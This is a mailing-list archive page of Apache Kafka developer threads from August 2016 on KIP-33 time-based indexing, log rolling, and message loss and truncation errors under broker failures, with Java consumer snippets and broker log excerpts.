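        TopicPartition tp = new TopicPartition("my-topic", 0);

        try (KafkaConsumer<byte[], byte[]> consumer = new KafkaConsumer<>(props)) {
            consumer.assign(Collections.singletonList(tp));
            Map<TopicPartition, OffsetAndTimestamp> result =
                consumer.offsetsForTimes(Collections.singletonMap(tp, oneHourAgo));
            OffsetAndTimestamp ot = result.get(tp);
            if (ot != null) {
                // Offset of the first message at or after the timestamp.
                consumer.seek(tp, ot.offset());
            }
        }
    }
}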

Do you plan to submit a patch to fix the time-based rolling issue?

Thanks,

Jun

On Fri, Aug 26, 2016 at 3:23 PM, Becket Qin <becket@gmail.com> wrote:

> Jun,
>
> Good point about the new log rolling behavior issue when moving replicas.
> Keeping the old behavior sounds reasonable to me.
>
> Currently the time index entry points to the exact shallow message with the
> indexed timestamp; are you suggesting we change it to point to the starting
> offset of the appended batch (message set)? That doesn't seem to work for
> truncation. For example, imagine an uncompressed message set [(m1,
> offset=100, timestamp=100, position=1000), (m2, offset=101, timestamp=105,
> position=1100)]. If we build the time index based on the starting offset of
> this message set, the index entry would be (105, 1000). Later on, when the
> log is truncated and m2 is truncated but m1 is not (this is possible for an
> uncompressed message set), we will not delete the time index
> entry because it is technically pointing to m1. Pointing to the end of the
> batch will not work either because then search by timestamp would miss m2.
>
> I am not sure if it is worth doing, but if we are willing to change the
> semantic to let the time index entry not point to the exact shallow
> message. I am thinking maybe we should just switch the semantic to the very
> original one, i.e. time index only means "Max timestamp up until this
> offset", which is also aligned with offset index entry.
>
> Thanks,
>
> Jiangjie (Becket) Qin
>
> On Fri, Aug 26, 2016 at 10:29 AM, Jun Rao <j...@confluent.io> wrote:
>
> > Jiangjie,
> >
> > I am not sure about changing the default to LogAppendTime since
> CreateTime
> > is probably what most people want. It also doesn't solve the problem
> > completely. For example, if you do partition reassignment and need to
> copy
> > a bunch of old log segments to a new broker, this may cause log rolling
> on
> > every message.
> >
> > Another alternative is to just keep the old time rolling behavior, which
> is
> > rolling based on the create time of the log segment. I had two use cases
> of
> > time-based rolling in mind. The first one is for users who don't want to
> > retain a message (say sensitive data) in the log for too long. For this,
> > one can set a time-based retention. If the log can roll periodically
> based
> > on create time, it will freeze the largest timestamp in the rolled
> segment
> > and cause it to be deleted when the time limit has been reached. Rolling
> > based on the timestamp of the first message doesn't help much here since
> > the retention is always based on the largest timestamp. The second one is
> > for log cleaner to happen quicker. Rolling logs periodically based on
> > create time will also work. So, it seems that if we preserve the old time
> > rolling behavior, we won't lose much functionality, but will avoid the
> > corner case where the logs could be rolled on every message. What do you
> > think?
> >
> > About storing file position in the time index, I don't think it needs to
> > incur overhead during append. At the beginning of append, we are already
> > getting the end position of the log (for maintaining the offset index).
> We
> > can just keep track of that together with the last seen offset. Storing
> the
> > position has the slight benefit that it avoids another indirection and
> > seems more consistent with the offset index. It's worth thinking through
> > whether this is better. If we want to change it, it's better to change it
> > now than later.
> >
> > Thanks,
> >
> > Jun
> >
> > On Thu, Aug 25, 2016 at 6:30 PM, Becket Qin <becket@gmail.com>
> wrote:
> >
> > > Hi Jan,
> > >
> > > It seems your main concern is for the changed behavior of time based
> log
> > > rolling and time based retention. That is actually why we have two
> > > timestamp types. If user set the log.message.timestamp.type to
> > > LogAppendTime, the broker will behave exactly the same as they were,
> > except
> > > the rolling and retention would be more accurate and independent to the
> > > replica movements.
> > >
> > > The log.message.timestam.max.difference.ms is only useful when users
> are
> > > using Creat

Re: KIP-33 Opt out from Time Based indexing

2016-08-29 Thread Jun Rao
g that is still there. (Maybe even redump from hadoop
> in extreme cases) ironically causing the log to roll all the time (as you
> probably publish to a new topic and have the streams application use both)
> :(
>
> As you can see, even though the users can seek, if they want to create
> proper numbers, e.g. billing information, they are in trouble, and giving
> them this index will just make them implement the wrong solution! It boils
> down to: this index is not the kafka way of doing things. The index can
> help the second approach but usually one chooses the confidence interval =
> as much as one can get.
>
> Then the last thing. "OffsetRequest is a legacy request. It's awkward to
> use and we plan to deprecate it over time". You've got to be kidding me. It
> was weird to get the byte position back then, but getting the offsets is
> perfectly reasonable and one of the best things in the world. Want to know
> how your stream looked at a specific point in time? Get the start and end
> offsets, fetch whenever you like, and you get a perfect snapshot in wall time.
> This is useful for compacted topics as well as streaming topics. Offsets are
> a well known thing in kafka and in no way awkward as its monotonically
> increasing property is just great.
>
> For seeking the log based on a confidence interval (the only chance you
> get in non-key logs reprocessing) one can also bisect the log from the
> client. As the case is rare it is intensive and causes at least a few
> hundred seeks for bigger topics. But I guess the broker does these extra
> for the new index file now.
>
> This index, I feel, is just not following the whole "kafka-way". Can you
> comment on the proposed refactoring? What are the chances of getting it
> upstream if I could pull it off? (unlikely)
>
> Thanks for all the effort you put into listening to my concerns. Highly
> appreciated!
>
> Best Jan
>
>
>
>
> On 25.08.2016 23:36, Jun Rao wrote:
>
> Jan,
>
> Thanks a lot for the feedback. Now I understood your concern better. The
> following are my comments.
>
> The first odd thing that you pointed out could be a real concern.
> Basically, if a producer publishes messages with really old timestamp, our
> default log.roll.hours (7 days) will indeed cause the broker to roll a log
> on every message, which would be bad. Time-based rolling is actually used
> infrequently. The only use case that I am aware of is that for compacted
> topics, rolling logs based on time could allow the compaction to happen
> sooner (since the active segment is never cleaned). One option is to change
> the default log.roll.hours to infinite and also document the impact on
> changing log.roll.hours. Jiangjie, what do you think?
>
> For the second odd thing, the OffsetRequest is a legacy request. It's
> awkward to use and we plan to deprecate it over time. That's why we haven't
> change the logic in serving OffsetRequest after KIP-33. The plan is to
> introduce a new OffsetRequest that will be exploiting the time based index.
> It's possible to have log segments with non-increasing largest timestamp.
> As you can see in Log.fetchOffsetsByTimestamp(), we simply iterate the
> segments in offset order and stop when we see the target timestamp.
>
> For the third odd thing, one of the original reasons why the time-based
> index points to an offset instead of the file position is that it makes
> truncating the time index to an offset easier since the offset is in the
> index. Looking at the code, we could also store the file position in the
> time index and do truncation based on position, instead of offset. It
> probably has a slight advantage of consistency between the two indexes and
> avoiding another level of indirection when looking up the time index.
> Jiangjie, have we ever considered that?
>
> The idea of log.message.timestamp.difference.max.ms is to prevent the
> timestamps in published messages from drifting too far away from the current
> timestamp. The default value is infinite though.
>
> Lastly, for the usefulness of time-based index, it's actually a feature
> that the community wanted and voted for, not just for Confluent customers.
> For example, being able to seek to an offset based on timestamp has been a
> frequently asked feature. This can be useful for at least the following
> scenarios: (1) If there is a bug in a consumer application, the user will
> want to rewind the consumption after fixing the logic. In this case, it's
> more convenient to rewind the consumption based on a timestamp. (2) In a
> multi data center setup, it's common for people to mirror the data from one
> Kafka cluster in one data center to another cluster in a different data
> center. If one data center fails, people want to be

Re: KIP-33 Opt out from Time Based indexing

2016-08-26 Thread Jun Rao
n the middle of an uncompressed
> message set, we may need to calculate the physical position for that
> message. This is doable but could potentially be an overhead for each
> append and adding some complexity. Given that OffsetRequest is supposed to
> be a pretty infrequent request, it is probably OK to do the secondary
> lookup but save the work on each append.
>
> Jun has already mentioned a few use cases for searching by timestamp. At
> LinkedIn we also have several such use cases where people want to rewind
> the offsets to a certain time and reprocess the streams.
>
> @Jun, currently we are using CreateTime as the default value for
> log.message.timestamp.type. I am wondering, would it be less surprising if
> we change the default value to LogAppendTime so that the previous behavior
> is maintained, because for users it would be bad if upgrading caused their
> messages to get deleted due to the change of behavior. What do you think?
>
> Thanks,
>
> Jiangjie (Becket) Qin
>
>
>
>
>
> On Thu, Aug 25, 2016 at 2:36 PM, Jun Rao <j...@confluent.io> wrote:
>
> > Jan,
> >
> > Thanks a lot for the feedback. Now I understood your concern better. The
> > following are my comments.
> >
> > The first odd thing that you pointed out could be a real concern.
> > Basically, if a producer publishes messages with really old timestamp,
> our
> > default log.roll.hours (7 days) will indeed cause the broker to roll a
> log
> > on every message, which would be bad. Time-based rolling is actually used
> > infrequently. The only use case that I am aware of is that for compacted
> > topics, rolling logs based on time could allow the compaction to happen
> > sooner (since the active segment is never cleaned). One option is to
> change
> > the default log.roll.hours to infinite and also document the impact on
> > changing log.roll.hours. Jiangjie, what do you think?
> >
> > For the second odd thing, the OffsetRequest is a legacy request. It's
> > awkward to use and we plan to deprecate it over time. That's why we
> haven't
> > change the logic in serving OffsetRequest after KIP-33. The plan is to
> > introduce a new OffsetRequest that will be exploiting the time based
> index.
> > It's possible to have log segments with non-increasing largest timestamp.
> > As you can see in Log.fetchOffsetsByTimestamp(), we simply iterate the
> > segments in offset order and stop when we see the target timestamp.
> >
> > For the third odd thing, one of the original reasons why the time-based
> > index points to an offset instead of the file position is that it makes
> > truncating the time index to an offset easier since the offset is in the
> > index. Looking at the code, we could also store the file position in the
> > time index and do truncation based on position, instead of offset. It
> > probably has a slight advantage of consistency between the two indexes
> and
> > avoiding another level of indirection when looking up the time index.
> > Jiangjie, have we ever considered that?
> >
> > The idea of log.message.timestamp.difference.max.ms is to prevent the
> > timestamps in published messages from drifting too far away from the
> current
> > timestamp. The default value is infinite though.
> >
> > Lastly, for the usefulness of time-based index, it's actually a feature
> > that the community wanted and voted for, not just for Confluent
> customers.
> > For example, being able to seek to an offset based on timestamp has been
> a
> > frequently asked feature. This can be useful for at least the following
> > scenarios: (1) If there is a bug in a consumer application, the user will
> > want to rewind the consumption after fixing the logic. In this case, it's
> > more convenient to rewind the consumption based on a timestamp. (2) In a
> > multi data center setup, it's common for people to mirror the data from
> one
> > Kafka cluster in one data center to another cluster in a different data
> > center. If one data center fails, people want to be able to resume the
> > consumption in the other data center. Since the offsets are not preserved
> > between the two clusters through mirroring, being able to find a starting
> > offset based on timestamp will allow the consumer to resume the
> consumption
> > without missing any messages and also not replaying too many messages.
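
(To make the rewind use case concrete: a sketch of timestamp-based seeking
with the offsetsForTimes() API that KIP-79 later added to the Java consumer;
the bootstrap address, topic, partition and target time below are made up for
illustration.)

    Properties props = new Properties();
    props.put("bootstrap.servers", "localhost:9092");
    props.put("key.deserializer",
        "org.apache.kafka.common.serialization.ByteArrayDeserializer");
    props.put("value.deserializer",
        "org.apache.kafka.common.serialization.ByteArrayDeserializer");
    KafkaConsumer<byte[], byte[]> consumer = new KafkaConsumer<>(props);

    TopicPartition tp = new TopicPartition("events", 0);
    consumer.assign(Collections.singletonList(tp));

    // Find the earliest offset whose timestamp is >= one hour ago.
    long target = System.currentTimeMillis() - 3600 * 1000L;
    Map<TopicPartition, OffsetAndTimestamp> result =
        consumer.offsetsForTimes(Collections.singletonMap(tp, target));
    OffsetAndTimestamp ot = result.get(tp);
    if (ot != null) {
        consumer.seek(tp, ot.offset()); // rewind and reprocess from here
    }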
> >
> > Thanks,
> >
> > Jun
> >
> >
> > On Wed, Aug 24, 2016 at 5:05 PM, Jan Filipiak <jan.filip...@trivago.com>
> > wrote:
> >
> > > Hey Jun,
> > >
> > > I go and try again :), wrote the 

Re: Networking errors and durability settings

2016-08-26 Thread Jun Rao
Bryan,

Were there multiple brokers losing ZK session around the same time? There
is one known issue https://issues.apache.org/jira/browse/KAFKA-1211.
Basically, if the leader changes too quickly, it's possible for a follower
to truncate some previous committed messages and then immediately becomes
the new leader. This can potentially cause the FATAL error. We do plan to
fix KAFKA-1211 in the future, but it may take some time.

Thanks,

Jun

On Fri, Aug 26, 2016 at 6:53 AM, Bryan Baugher  wrote:

> We didn't suffer any data loss nor was there any power outage that I know
> of.
>
> On Fri, Aug 26, 2016 at 5:14 AM Khurrum Nasim 
> wrote:
>
> > On Tue, Aug 23, 2016 at 9:00 AM, Bryan Baugher  wrote:
> > >
> > > > Hi everyone,
> > > >
> > > > Yesterday we had lots of network failures running our Kafka cluster
> > > > (0.9.0.1 ~40 nodes). We run everything using the higher durability
> > > > settings in order to avoid any data loss: producers use all/-1 ack,
> > > > topics/brokers have min insync replicas = 2, unclean leader election =
> > > > false, and all topics have 3 replicas.
> > >
> >
> > We also hit a few similar data loss issues before. It made us concerned
> > about putting critical data into Kafka.
> > Apache DistributedLog seems to be very good at durability and strong
> > consistency. We are actually evaluating it as kafka's backend.
> >
> > - KN
> >
> >
> > > >
> > > > This isn't the first time this has happened to us. When trying to
> bring
> > > the
> > > > cluster back online brokers would die on start up with,
> > > >
> > > > 2016-08-22 16:49:34,365 FATAL kafka.server.ReplicaFetcherThread:
> > > > [ReplicaFetcherThread-2-6], Halting because log truncation is not
> > allowed
> > > > for topic XXX, Current leader 6's latest offset 333005055 is less
> than
> > > > replica 31's latest offset 333005155
> > > >
> > > > In this case the broker we were starting (31) had a higher offset than
> > > > the running broker (6).
> > > >
> > > > Our team ended up just trying all different combinations of start
> > > > orders to get the cluster back online. They managed to get most of them
> > > > back online doing this but struggled with the last couple, where they
> > > > had to copy kafka log files for the partition that was giving us trouble
> > > > from the 2 replicas previously in sync with higher offsets to the broker
> > > > that had the lower offset but was elected leader.
> > > >
> > > > Our guess as to why we had so much trouble during start up is that,
> > > > with so many partitions and a replication factor of 3, we had a spider
> > > > web of partitions and possibly a deadlock, where some brokers would be
> > > > the appropriate in-sync leaders for some partitions but not in-sync for
> > > > others, which would cause brokers to fail on start up.
> > > >
> > > > So from this do you have any suggestions on what we could do better
> > next
> > > > time?
> > > >
> > > > Also, doesn't the fact that kafka elected a broker as leader with a
> > > > lower offset mean an unclean leader election occurred? It seems like we
> > > > are only saved by the error message on the other brokers during start up
> > > > indicating it happened, and by the fact that we set min insync replicas
> > > > to 2 / acks = -1/all; otherwise writes could come in to that leader, the
> > > > offset could then be higher, and I would imagine no error would occur.
> > > >
> > >
> > >
> > >
> > > --
> > > -- Guozhang
> > >
> >
>


Re: Networking errors and durability settings

2016-08-25 Thread Jun Rao
Bryan,

https://issues.apache.org/jira/browse/KAFKA-3410 reported a similar issue
but only happened when the leader broker's log was manually deleted. In
your case, was there any data loss in the broker due to things like power
outage?

Thanks,

Jun

On Tue, Aug 23, 2016 at 9:00 AM, Bryan Baugher  wrote:

> Hi everyone,
>
> Yesterday we had lots of network failures running our Kafka cluster
> (0.9.0.1 ~40 nodes). We run everything using the higher durability settings
> in order to avoid any data loss: producers use all/-1 ack, topics/brokers
> have min insync replicas = 2, unclean leader election = false, and all
> topics have 3 replicas.
>
> This isn't the first time this has happened to us. When trying to bring the
> cluster back online brokers would die on start up with,
>
> 2016-08-22 16:49:34,365 FATAL kafka.server.ReplicaFetcherThread:
> [ReplicaFetcherThread-2-6], Halting because log truncation is not allowed
> for topic XXX, Current leader 6's latest offset 333005055 is less than
> replica 31's latest offset 333005155
>
> In this case the broker we were starting (31) had a higher offset than the
> running broker (6).
>
> Our team ended up just trying all different combinations of start orders to
> get the cluster back online. They managed to get most of them back online
> doing this but struggled with the last couple, where they had to copy kafka
> log files for the partition that was giving us trouble from the 2 replicas
> previously in sync with higher offsets to the broker that had the lower
> offset but was elected leader.
>
> Our guess as to why we had so much trouble during start up is that, with so
> many partitions and a replication factor of 3, we had a spider web of
> partitions and possibly a deadlock, where some brokers would be the
> appropriate in-sync leaders for some partitions but not in-sync for others,
> which would cause brokers to fail on start up.
>
> So from this do you have any suggestions on what we could do better next
> time?
>
> Also, doesn't the fact that kafka elected a broker as leader with a lower
> offset mean an unclean leader election occurred? It seems like we are only
> saved by the error message on the other brokers during start up indicating it
> happened, and by the fact that we set min insync replicas to 2 / acks =
> -1/all; otherwise writes could come in to that leader, the offset could then
> be higher, and I would imagine no error would occur.
>


Re: KIP-33 Opt out from Time Based indexing

2016-08-25 Thread Jun Rao
log.roll.ms defaults to ~7 days.
>
>
> second odd thing:
> Quote
> ---
> A time index entry (*T*, *offset*) means that in this segment any message
> whose timestamp is greater than *T* comes after *offset*.
>
> The OffsetRequest behaves almost the same as before. If timestamp *T* is
> set in the OffsetRequest, the first offset in the returned offset sequence
> means that if a user wants to consume from *T*, that is the offset to start
> with. The guarantee is that any message whose timestamp is greater than T
> has a bigger offset. i.e. Any message before this offset has a timestamp <
> *T*.
> ---
>
> Given how the index is maintained, with a little bit of bad luck (rolling
> upgrade/config change of mirrormakers for different colocations) one ends up
> with segmentN.timeindex.maxtimestamp > segmentN+1.timeindex.maxtimestamp.
> If I am not overlooking something here, then the fetch code does not seem to
> take that into account.
> https://github.com/apache/kafka/blob/79d3fd2bf0e5c89ff74a2988c40388
> 2ae8a9852e/core/src/main/scala/kafka/log/Log.scala#L604
> In this case goal number 1 listed, not losing any messages, is not achieved.
> An easy fix seems to be to sort the segsArray by maxtimestamp, but I can't
> wrap my head around it just now.
>
>
> third odd thing:
> Regarding the worry of increasing complexity. Looking at the code
> https://github.com/apache/kafka/blob/79d3fd2bf0e5c89ff74a2988c40388
> 2ae8a9852e/core/src/main/scala/kafka/log/LogSegment.scala#L193 -196
> https://github.com/apache/kafka/blob/79d3fd2bf0e5c89ff74a2988c40388
> 2ae8a9852e/core/src/main/scala/kafka/log/LogSegment.scala#L227 & 230
> https://github.com/apache/kafka/blob/79d3fd2bf0e5c89ff74a2988c40388
> 2ae8a9852e/core/src/main/scala/kafka/log/LogSegment.scala#L265 -266
> https://github.com/apache/kafka/blob/79d3fd2bf0e5c89ff74a2988c40388
> 2ae8a9852e/core/src/main/scala/kafka/log/LogSegment.scala#L305 -307
> https://github.com/apache/kafka/blob/79d3fd2bf0e5c89ff74a2988c40388
> 2ae8a9852e/core/src/main/scala/kafka/log/LogSegment.scala#L408 - 410
> https://github.com/apache/kafka/blob/79d3fd2bf0e5c89ff74a2988c40388
> 2ae8a9852e/core/src/main/scala/kafka/log/LogSegment.scala#L432 - 435
> https://github.com/apache/kafka/blob/05d00b5aca2e1e59ad685a3f051d2a
> b022f75acc/core/src/main/scala/kafka/log/LogSegment.scala#L104 -108
> and especially
> https://github.com/apache/kafka/blob/79d3fd2bf0e5c89ff74a2988c40388
> 2ae8a9852e/core/src/main/scala/kafka/log/Log.scala#L717
> it feels like the Log & LogSegment having detailed knowledge about the
> maintained indexes is not the ideal way to model the problem.
> Having the server maintain a Set of indexes could reduce the code
> complexity, while also allowing an easy switch to turn it off. I think both
> indexes could point to the physical position; a client would do
> fetch(timestamp), and then continue with the offsets as usual. Is there any
> specific reason the timestamp index points into the offset index?
> For reading one would need to branch earlier, maybe already in ApiHandler
> and decide what indexes to query, but this branching logic is there now
> anyhow.
>
> Further, I also can't think of a situation where one wants to have this
> log.message.timestamp.difference.max.ms take effect. I think this defeats
> goal 1 again.
>
> In the end, having this index in the brokers now feels weird to me. It gives
> me a feeling of complexity that I don't need, and I have a hard time figuring
> out how much other people can benefit from it. I hope that this feedback is
> useful and helps you understand my scepticism regarding this thing. There
> were some other oddities that I have a hard time recalling now. So I guess
> the index was built for a specific confluent customer; will there be any
> blogpost about their use case? Or can you share it?
>
> Best Jan
>
>
> On 24.08.2016 16:47, Jun Rao wrote:
>
> Jan,
>
> Thanks for the reply. I actually wasn't sure what your main concern on
> time-based rolling is. Just a couple of clarifications. (1) Time-based
> rolling doesn't control how long a segment will be retained for. For
> retention, if you use time-based, it will now be based on the timestamp in
> the message. If you use size-based, it works the same as before. Is your
> concern on time-based retention? If so, you can always configure the
> timestamp in all topics to be log append time, which will give you the same
> behavior as before. (2) The creation time of the segment is never exposed
> to the consumer and therefore is never preserved in MirrorMaker. In
> contrast, the timestamp in the message will be preserved in MirrorMaker.
> So, not sure what your concern on MirrorMaker is.
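
(For reference, the configuration mentioned above is a single setting, shown
here as a broker-level server.properties line for illustration; an equivalent
per-topic override exists as well:

    log.message.timestamp.type=LogAppendTime
)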
>
> Jun
>
> On Wed, Aug 24, 2016 at 5:03 AM, Jan Fili

Re: kafka broker is dropping the messages after acknowledging librdkafka

2016-08-19 Thread Jun Rao
Mazhar,

Let's first confirm if this is indeed a bug. As I mentioned earlier, it's
possible to have message loss with ack=1 when there are (leader) broker
failures. If this is not the case, please file a jira and describe how to
reproduce the problem. Also, it would be useful to know if the message loss
happens with the java producer too. This will help isolate whether this is
a server side or a client side issue.

Thanks,

Jun

On Fri, Aug 19, 2016 at 2:15 AM, Mazhar Shaikh <mazhar.shaikh...@gmail.com>
wrote:

> Hi Jun,
>
> In my earlier runs, I had enabled delivery report (with and without offset
> report) facility provided by librdkafka.
>
> The producer has received successful delivery reports for all messages sent
> even though the messages were lost.
>
> As you mentioned, the producer has nothing to do with this loss of messages.
>
> I just want to know, as when can we get the fix for this bug ?
>
> Thanks.
>
> Regards,
> Mazhar Shaikh
>
>
> On Fri, Aug 19, 2016 at 1:24 AM, Jun Rao <j...@confluent.io> wrote:
>
> > Mazhar,
> >
> > With ack=1, whether you lose messages or not is not deterministic. It
> > depends on the time when the broker receives/acks a message, the follower
> > fetches the data and the broker fails. So, it's possible that you got
> lucky
> > in one version and unlucky in another.
> >
> > Thanks,
> >
> > Jun
> >
> > On Thu, Aug 18, 2016 at 12:11 PM, Mazhar Shaikh <
> > mazhar.shaikh...@gmail.com>
> > wrote:
> >
> > > Hi Jun,
> > >
> > > Thanks for the clarification, I'll give it a try with ack=-1 (in the
> > > producer).
> > >
> > > However, I did a fallback to an older version of kafka
> > > (*kafka_2.10-0.8.2.1*), and I don't see this issue (loss of messages).
> > >
> > > It looks like kafka_2.11-0.9.0.1 has issues (a bug) during replication.
> > >
> > > Thanks,
> > >
> > > Regards,
> > > Mazhar Shaikh.
> > >
> > >
> > >
> > > On Thu, Aug 18, 2016 at 10:30 PM, Jun Rao <j...@confluent.io> wrote:
> > >
> > > > Mazhar,
> > > >
> > > > There is probably a misunderstanding. Ack=-1 (or all) doesn't mean
> > > waiting
> > > > for all replicas. It means waiting for all replicas that are in sync.
> > So,
> > > > if a replica is down, it will be removed from the in-sync replicas,
> > which
> > > > allows the producer to continue with fewer replicas.
> > > >
> > > > For the connection issue that you saw in the log, this could happen
> > when
> > > a
> > > > connection is idle for some time. It won't break the replication
> logic
> > > > since a new connection will be created automatically. You can
> increase
> > > the
> > > > socket idle time on the broker if you want to turn off this behavior.
> > > >
> > > > Thanks,
> > > >
> > > > Jun
> > > >
> > > > On Thu, Aug 18, 2016 at 12:07 AM, Mazhar Shaikh <
> > > > mazhar.shaikh...@gmail.com>
> > > > wrote:
> > > >
> > > > > Hi Jun,
> > > > >
> > > > > Setting acks to -1 may solve this issue.
> > > > > But it will cause the producer buffer to fill up under load tests,
> > > > > resulting in failures and dropped messages on the client (producer)
> > > > > side. Hence, this will not actually solve the problem.
> > > > >
> > > > > I need to fix this from kafka broker side, so that there is no
> impact
> > > on
> > > > > producer or consumer.
> > > > >
> > > > > From the logs it looks like there is a connection problem between
> > > > > brokers and the kafka broker is losing records during this process.
> > > > >
> > > > > But why is the kafka broker losing records?
> > > > >
> > > > > I feel this is a BUG in kafka.
> > > > >
> > > > > [2016-08-17 12:54:50,293] TRACE [Controller 2]: checking need to
> > > trigger
> > > > > partition rebalance (kafka.controller.KafkaController)
> > > > > [2016-08-17 12:54:50,294] DEBUG [Controller 2]: preferred replicas
> by
> > > > > broker Map(0 -> Map([topic1,45] -> List(0, 1), [topic1,17] ->
> List(0,
> > > 1),
> > > > > [topic1,19] -> List(0, 1), [topic1,42] -> List(0, 1), [topic1,43]
> ->
> > > > > List(0,

Re: kafka broker is dropping the messages after acknowledging librdkafka

2016-08-18 Thread Jun Rao
Mazhar,

With ack=1, whether you lose messages or not is not deterministic. It
depends on the time when the broker receives/acks a message, the follower
fetches the data and the broker fails. So, it's possible that you got lucky
in one version and unlucky in another.

Thanks,

Jun

On Thu, Aug 18, 2016 at 12:11 PM, Mazhar Shaikh <mazhar.shaikh...@gmail.com>
wrote:

> Hi Jun,
>
> Thanks for the clarification, I'll give it a try with ack=-1 (in the
> producer).
>
> However, I did a fallback to an older version of kafka
> (*kafka_2.10-0.8.2.1*), and I don't see this issue (loss of messages).
>
> It looks like kafka_2.11-0.9.0.1 has issues (a bug) during replication.
>
> Thanks,
>
> Regards,
> Mazhar Shaikh.
>
>
>
> On Thu, Aug 18, 2016 at 10:30 PM, Jun Rao <j...@confluent.io> wrote:
>
> > Mazhar,
> >
> > There is probably a misunderstanding. Ack=-1 (or all) doesn't mean
> waiting
> > for all replicas. It means waiting for all replicas that are in sync. So,
> > if a replica is down, it will be removed from the in-sync replicas, which
> > allows the producer to continue with fewer replicas.
> >
> > For the connection issue that you saw in the log, this could happen when
> a
> > connection is idle for some time. It won't break the replication logic
> > since a new connection will be created automatically. You can increase
> the
> > socket idle time on the broker if you want to turn off this behavior.
> >
> > Thanks,
> >
> > Jun
> >
> > On Thu, Aug 18, 2016 at 12:07 AM, Mazhar Shaikh <
> > mazhar.shaikh...@gmail.com>
> > wrote:
> >
> > > Hi Jun,
> > >
> > > Setting acks to -1 may solve this issue.
> > > But it will cause the producer buffer to fill up under load tests,
> > > resulting in failures and dropped messages on the client (producer)
> > > side. Hence, this will not actually solve the problem.
> > >
> > > I need to fix this from kafka broker side, so that there is no impact
> on
> > > producer or consumer.
> > >
> > > From the logs it looks like there is a connection problem between
> > > brokers and the kafka broker is losing records during this process.
> > >
> > > But why is the kafka broker losing records?
> > >
> > > I feel this is a BUG in kafka.
> > >
> > > [2016-08-17 12:54:50,293] TRACE [Controller 2]: checking need to
> trigger
> > > partition rebalance (kafka.controller.KafkaController)
> > > [2016-08-17 12:54:50,294] DEBUG [Controller 2]: preferred replicas by
> > > broker Map(0 -> Map([topic1,45] -> List(0, 1), [topic1,17] -> List(0,
> 1),
> > > [topic1,19] -> List(0, 1), [topic1,42] -> List(0, 1), [topic1,43] ->
> > > List(0, 1), [topic1,44] -> List(0, 1), [topic1,16] -> List(0, 1),
> > > [topic1,46] -> List(0, 1), [topic1,20] -> List(0, 1), [topic1,41] ->
> > > List(0, 1), [topic1,18] -> List(0, 1), [topic1,22] -> List(0, 1),
> > > [topic1,40] -> List(0, 1), [topic1,47] -> List(0, 1), [topic1,23] ->
> > > List(0, 1), [topic1,21] -> List(0, 1)), 5 -> Map([topic1,78] -> List(5,
> > 3),
> > > [topic1,84] -> List(5, 3), [topic1,87] -> List(5, 3), [topic1,74] ->
> > > List(5, 3), [topic1,81] -> List(5, 3), [topic1,73] -> List(5, 3),
> > > [topic1,80] -> List(5, 3), [topic1,77] -> List(5, 3), [topic1,75] ->
> > > List(5, 3), [topic1,85] -> List(5, 3), [topic1,76] -> List(5, 3),
> > > [topic1,83] -> List(5, 3), [topic1,86] -> List(5, 3), [topic1,72] ->
> > > List(5, 3), [topic1,79] -> List(5, 3), [topic1,82] -> List(5, 3)), 1 ->
> > > Map([topic1,92] -> List(1, 0), [topic1,95] -> List(1, 0), [topic1,69]
> ->
> > > List(1, 0), [topic1,93] -> List(1, 0), [topic1,70] -> List(1, 0),
> > > [topic1,67] -> List(1, 0), [topic1,65] -> List(1, 0), [topic1,88] ->
> > > List(1, 0), [topic1,90] -> List(1, 0), [topic1,66] -> List(1, 0),
> > > [topic1,94] -> List(1, 0), [topic1,64] -> List(1, 0), [topic1,89] ->
> > > List(1, 0), [topic1,68] -> List(1, 0), [topic1,71] -> List(1, 0),
> > > [topic1,91] -> List(1, 0)), 2 -> Map([topic1,8] -> List(2, 4),
> [topic1,3]
> > > -> List(2, 4), [topic1,15] -> List(2, 4), [topic1,2] -> List(2, 4),
> > > [topic1,1] -> List(2, 4), [topic1,6] -> List(2, 4), [topic1,9] ->
> List(2,
> > > 4), [topic1,12] -> List(2, 4), [topic1,14] -> List(2, 4), [topic1,11]
> ->
> > > List(2, 4), [topic1,13] -> List(2, 4)

Re: kafka broker is dropping the messages after acknowledging librdkafka

2016-08-18 Thread Jun Rao
c1,33], [topic1,28]) (kafka.controller.
> IsrChangeNotificationListener)
> [2016-08-17 13:05:42,690] DEBUG [IsrChangeNotificationListener] Fired!!!
> (kafka.controller.IsrChangeNotificationListener)
> [2016-08-17 13:09:50,293] TRACE [Controller 2]: checking need to trigger
> partition rebalance (kafka.controller.KafkaController)
> [2016-08-17 13:09:50,295] DEBUG [Controller 2]: preferred replicas by
> broker Map(0 -> Map([topic1,45] -> List(0, 1), [topic1,17] -> List(0, 1),
> [topic1,19] -> List(0, 1), [topic1,42] -> List(0, 1), [topic1,43] ->
> List(0, 1), [topic1,44] -> List(0, 1), [topic1,16] -> List(0, 1),
> [topic1,46] -> List(0, 1), [topic1,20] -> List(0, 1), [topic1,41] ->
> List(0, 1), [topic1,18] -> List(0, 1), [topic1,22] -> List(0, 1),
> [topic1,40] -> List(0, 1), [topic1,47] -> List(0, 1), [topic1,23] ->
> List(0, 1), [topic1,21] -> List(0, 1)), 5 -> Map([topic1,78] -> List(5, 3),
> [topic1,84] -> List(5, 3), [topic1,87] -> List(5, 3), [topic1,74] ->
> List(5, 3), [topic1,81] -> List(5, 3), [topic1,73] -> List(5, 3),
> [topic1,80] -> List(5, 3), [topic1,77] -> List(5, 3), [topic1,75] ->
> List(5, 3), [topic1,85] -> List(5, 3), [topic1,76] -> List(5, 3),
> [topic1,83] -> List(5, 3), [topic1,86] -> List(5, 3), [topic1,72] ->
> List(5, 3), [topic1,79] -> List(5, 3), [topic1,82] -> List(5, 3)), 1 ->
> Map([topic1,92] -> List(1, 0), [topic1,95] -> List(1, 0), [topic1,69] ->
> List(1, 0), [topic1,93] -> List(1, 0), [topic1,70] -> List(1, 0),
> [topic1,67] -> List(1, 0), [topic1,65] -> List(1, 0), [topic1,88] ->
> List(1, 0), [topic1,90] -> List(1, 0), [topic1,66] -> List(1, 0),
> [topic1,94] -> List(1, 0), [topic1,64] -> List(1, 0), [topic1,89] ->
> List(1, 0), [topic1,68] -> List(1, 0), [topic1,71] -> List(1, 0),
> [topic1,91] -> List(1, 0)), 2 -> Map([topic1,8] -> List(2, 4), [topic1,3]
> -> List(2, 4), [topic1,15] -> List(2, 4), [topic1,2] -> List(2, 4),
> [topic1,1] -> List(2, 4), [topic1,6] -> List(2, 4), [topic1,9] -> List(2,
> 4), [topic1,12] -> List(2, 4), [topic1,14] -> List(2, 4), [topic1,11] ->
